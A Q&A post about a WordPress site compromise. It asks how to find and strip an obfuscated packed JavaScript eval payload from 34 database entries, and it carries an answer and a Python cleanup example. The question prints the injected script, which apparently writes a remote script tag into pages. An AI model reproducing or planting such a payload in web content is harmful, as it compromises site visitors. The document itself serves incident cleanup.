MySQL – Search SQL database for malicious code using grep or find

MySQL

The following code exists in 34 entries in my WordPress database.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|andfs|var|u0026u|referrer|hseaf||js|php'.split('|'),0,{}))

I have found these entries using grep -c "p,a,c,k,e,d" database_backup.sql. Now I need to run a grep/find command, or a shell SQL command, to select and remove this code from the affected rows.

Best Answer

It could be quite a challenge to change the dump file. So, instead, load the data into a different database (preferably a different computer), then use SQL to find and zap.

A problem with trying to do it in the dump file is that it probably has multiple (hundreds or thousands) rows in a single INSERT statement. In fact, there may be only 34 INSERT statements, and perhaps every row is infected.

As for "removing the code", we would need to see

  • SHOW CREATE TABLE
  • the name of the infected column
  • Whether the entire column looks like that, or that is embedded in the string and you want to save the rest.
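
The load-then-clean approach from the answer, as an added example that is not part of the original post: it shows that grep -c counts dump lines rather than infected rows, then strips the packed block from each affected value while keeping the rest of the string. It assumes the WordPress table wp_posts with columns ID and post_content, an optional <script> wrapper around the payload, and a shortened constructed payload; an in-memory SQLite database stands in for the scratch MySQL copy.

```python
import re
import sqlite3

SIGNATURE = "p,a,c,k,e,d"  # the string the question grepped for

# One packed block: from the wrapper's opening to its closing ".split('|'),N,{}))".
# The optional <script> wrapper around it is an assumption about the embedding.
PACKED = r"eval\(function\(p,a,c,k,e,d\)\{.*?\.split\('\|'\),\d+,\{\}\)\)"
BLOCK = re.compile(r"(?:<script\b[^>]*>\s*)?" + PACKED + r"(?:\s*;?\s*</script>)?", re.DOTALL)

# Constructed sample: a shortened payload with the same shape as the question's.
PAYLOAD = "eval(function(p,a,c,k,e,d){return p}('0.6(\"\");',30,30,'document||write'.split('|'),0,{}))"

def dump_counts(dump_text):
    """Return (matching lines, occurrences); grep -c reports only the first."""
    lines = sum(1 for line in dump_text.splitlines() if SIGNATURE in line)
    return lines, dump_text.count(SIGNATURE)

def strip_packed(value):
    """Remove every packed block from one column value and keep the rest."""
    return BLOCK.sub("", value)

def clean_table(conn, table, key, column):
    """Rewrite infected rows in the scratch copy; returns the ids it changed.
    table, key and column are operator-supplied identifiers, not user input."""
    rows = conn.execute(
        f"SELECT {key}, {column} FROM {table} "
        f"WHERE instr({column}, ?) > 0 ORDER BY {key}", (SIGNATURE,)).fetchall()
    for row_id, value in rows:
        conn.execute(f"UPDATE {table} SET {column} = ? WHERE {key} = ?",
                     (strip_packed(value), row_id))
    conn.commit()
    return [row_id for row_id, _ in rows]

def demo():
    """Constructed data: three rows, two infected, in one extended INSERT."""
    values = [(1, "Hello " + PAYLOAD), (2, "clean"),
              (3, "<script>" + PAYLOAD + "</script> tail")]
    dump = "INSERT INTO wp_posts VALUES " + ",".join(
        "(%d,'%s')" % (i, v.replace("'", "\\'")) for i, v in values) + ";\n"
    conn = sqlite3.connect(":memory:")  # stand-in for the scratch MySQL copy
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_content TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?)", values)
    changed = clean_table(conn, "wp_posts", "ID", "post_content")
    contents = [r[0] for r in conn.execute("SELECT post_content FROM wp_posts ORDER BY ID")]
    return dump_counts(dump), changed, contents

if __name__ == "__main__":
    print(demo())
```

Run the same search against every text column of the restored copy (options, comments, post meta), since the signature count from the dump does not say which tables hold the rows.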